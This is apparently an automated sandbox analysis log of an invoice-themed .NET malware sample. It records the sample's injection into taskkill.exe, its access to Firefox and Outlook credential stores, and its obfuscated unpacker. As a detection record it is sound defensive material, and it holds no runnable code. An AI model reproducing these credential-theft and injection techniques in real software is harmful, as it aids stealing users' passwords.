            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COMMERCIAL INVOICES.exe.logJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\taskkill.exeFile created: C:\Users\user\AppData\Local\Temp\2636-l0Jump to behavior
            Source: COMMERCIAL INVOICES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: COMMERCIAL INVOICES.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: taskkill.exe, 00000006.00000003.2721451658.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2723146338.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3897956616.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3897956616.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2721360594.0000000002B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: COMMERCIAL INVOICES.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"Jump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: COMMERCIAL INVOICES.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: COMMERCIAL INVOICES.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oKWoZthfkV.exe, 00000005.00000000.2455201096.000000000006E000.00000002.00000001.01000000.0000000C.sdmp, oKWoZthfkV.exe, 00000009.00000000.2612639355.000000000006E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: COMMERCIAL INVOICES.exe, COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs.Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs.Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs.Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_02BA4658 push edx; retn 0002h0_2_02BA465A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_02BA47B0 push esi; retn 0002h0_2_02BA47B2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_02BA4779 push esi; retn 0002h0_2_02BA477A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004030C0 push eax; ret 4_2_004030C2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004118F6 push esp; retf 4_2_004118F7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004048FD push edx; retf 4_2_00404913
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0040D094 push esp; retf 4_2_0040D095
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00404979 push ebp; retf 4_2_0040497D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00404903 push edx; retf 4_2_00404913
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00404ACD push ebx; retf 4_2_00404B02
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00408370 push ebp; retf 4_2_00408376
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00405B15 push eax; retf 4_2_00405B16
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00404B85 push es; iretd 4_2_00404B9E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00401B88 push es; ret 4_2_00401B89
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00413CF5 push es; iretd 4_2_00413CF9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0041349C push ecx; iretd 4_2_0041349D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00413ED9 push esi; retf 4_2_00413EDA
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0040CE88 push FFFFFFDCh; retf 4_2_0040CE9A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00415783 push esi; ret 4_2_00415787
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012409AD push ecx; mov dword ptr [esp], ecx4_2_012409B6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B727FA pushad ; ret 6_2_04B727F9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B7225F pushad ; ret 6_2_04B727F9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B7283D push eax; iretd 6_2_04B72858
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BA09AD push ecx; mov dword ptr [esp], ecx6_2_04BA09B6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00873750 push esp; ret 6_2_008737E5
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0085E833 push esp; retf 6_2_0085E834
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00852A52 push eax; retf 6_2_00852A53
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0086512B push eax; ret 6_2_0086512D
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_008552AD push ebp; retf 6_2_008552B3
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_008518B6 push ebp; retf 6_2_008518BA
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0085183A push edx; retf 6_2_00851850
            Source: COMMERCIAL INVOICES.exeStatic PE information: section name: .text entropy: 7.868773952918643
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, nYtUVc1f98ph2ybXswK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, bUWG7PgKOhSfiEeOT7.csHigh entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, qrSvWW10fNhaTHKXDHV.csHigh entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.csHigh entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, xpvY8rRaUE3whfWfo7.csHigh entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, RUACNAEq3joZFW6PJt.csHigh entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, klUv3e7OgOX75n6OJS.csHigh entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, q598vXWMJVqmSJ4TcV.csHigh entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, U4MZBR8NwmLOtx27mp.csHigh entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, XYbpMIyCGhf593orlY.csHigh entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, e9ABKXtgEBCcdDS8fM.csHigh entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, HdBXwX4EpLlOYfjryw.csHigh entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, vVQ4gmc6IjLKXDHf3D.csHigh entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, bZLr5dIHP2nUPnA0nI.csHigh entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, hCECRwYOSLpQCB6qx8.csHigh entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, DP8bVlHOj0ljQyuNZ6.csHigh entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, mfFkuJ5rWwRdGwBJMS.csHigh entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, YLPLgdjdRFYqApV2un.csHigh entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, nYtUVc1f98ph2ybXswK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, bUWG7PgKOhSfiEeOT7.csHigh entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, qrSvWW10fNhaTHKXDHV.csHigh entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.csHigh entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, xpvY8rRaUE3whfWfo7.csHigh entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, RUACNAEq3joZFW6PJt.csHigh entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, klUv3e7OgOX75n6OJS.csHigh entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, q598vXWMJVqmSJ4TcV.csHigh entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, U4MZBR8NwmLOtx27mp.csHigh entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, XYbpMIyCGhf593orlY.csHigh entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, e9ABKXtgEBCcdDS8fM.csHigh entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, HdBXwX4EpLlOYfjryw.csHigh entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, vVQ4gmc6IjLKXDHf3D.csHigh entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
